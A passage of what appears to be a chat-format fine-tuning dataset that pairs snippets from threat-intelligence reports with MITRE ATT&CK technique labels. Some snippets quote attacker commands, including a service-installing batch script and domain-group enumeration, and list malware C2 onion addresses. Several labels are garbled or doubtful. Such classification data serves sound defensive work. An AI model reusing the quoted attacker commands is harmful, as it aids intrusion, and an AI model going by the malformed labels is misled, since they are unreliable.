- "content": "uses the ipconfig /all command to gather the victim’s IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used HTTP POSTs to exfil gathered information."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK has captured victim IP address details."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has obfuscated its strings with a simple XOR encryption with a static key."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can query the Registry on compromised hosts using \"RegQueryValueExA\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They also primarily used IP addresses originating from the same country as the victim for their VPN infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We also identified a Tomiris variant (internally named “SBZ”, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used Registry keys to detect and avoid executing in potential sandboxes."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has registered domains to impersonate services such as Dropbox to distribute malware."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in order to speed necessary card scan logic"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransom note instructs the victim to use a unique URL to decrypt their files. Victims must provide the key and extension name included in the ransom note. The key specified in the ransom note is the Base64-encoded representation of the encrypted stat data stored in the registry"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used an additional filename extension to hide the true file type."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1036.007 - Masquerading: Double File Extension"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned by the Cisco Talos Intelligence Group, after executing the Micropsia registers itself against the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can use \"DirectoryList\" to enumerate files in a specified directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Where the number of passed parameters is one, the payload will read the sys.bin.url file from %appdata%\\systemconfig. It will then spawns a new svchost process as C:\\\\windows\\\\system32\\\\svchost.exe –k update in suspended state and injects the payload. Finally, it patches the entry point of svchost.exe so it can execute the malicious payload after the ResumeThread call"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is known to use software packing in its tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copied and installed tools for operations once in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave™ wrote: “Hey, good job on being the first to release a plugin for Imminent Monitor"
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky created and used a mailing toolkit to use in spearphishing attacks."
- },
- {
- "role": "assistant",
- "content": "T1587 - Develop Capabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can establish persistence by creating a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke has used \"HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As days go by, more of the reported ransomware attacks turn out to be related to the new Pay2Key ransomware. The attacker followed the same procedure to gain a foothold, propagate and remotely control the infection within the compromised companies."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. This modification to the system time was seen in the previous campaign, and the temporary license key within the wiper component is the exact same as wiper component from the 2012 attacks. The wiper itself queries the following registry keys to obtain a list of partitions to overwrite"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The information collected is performed using WMI queries: Additionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARUSH has created a service named `Service1` for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet collects the time and date of a system when it is infected."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine’s %APPDATA% directory. The built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file. Unit 42 has observed a total of two variants of Comnie. One of the ways the variants differ is in how they obtain their command and control (C2) information. Both variants make use of third-party online services in an attempt to prevent DNS based blocking of their first stage communications. In older variants, Comnie was found to look for the ‘++a++’ markers. The example C2s used by older variants of Comnie demonstrates this"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used stolen certificates from Electrum Technologies GmbH to sign payloads."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has obfuscated code using base64 and gzip compression."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copy %~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f sc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\" SC failure \"%SERVICE_NAME%\" reset= 86400 actions=\""
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory. It also only wipes files that have specific file extensions"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner has monitored CPU usage."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware', 'T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run \"net group /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created a that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We’ve seen two onion addresses used in different samples: g5wcesdfjzne7255.onion (Down) r2elajikcosf7zee.onion (Alive at time of writing) The HTTP resource always starts with /api/osx/ and contains actions such as: /api/osx/started to report the bot has just started /api/osx/keychain to exfiltrate the content of the keychain /api/osx/get_task?bot_id={botid}&version={version} to request a task (described below) /api/osx/cmd_executed to report a the output of a command that was executed /api/osx/task_complete?bot_id={botid}&task_id={taskid} to report a task was completed HTTP POST content has two fields: bot_id and data"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has targeted manufacturers in the supply chain for the defense industry."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The overwritten code reads the ransom note string inside the MBR and sets it to appear on the display"
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used net group /domain, net localgroup administrators, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to find group permission settings on a victim."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS)."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can inject decrypted shellcode into the LanmanServer service."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following these checks, it drops several more malware files signed with the pasted AMD digital signature to a directory it creates"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to detect anti-virus products and processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has copied itself to and infected files in network drives for propagation."
- },
- {
- "role": "assistant",
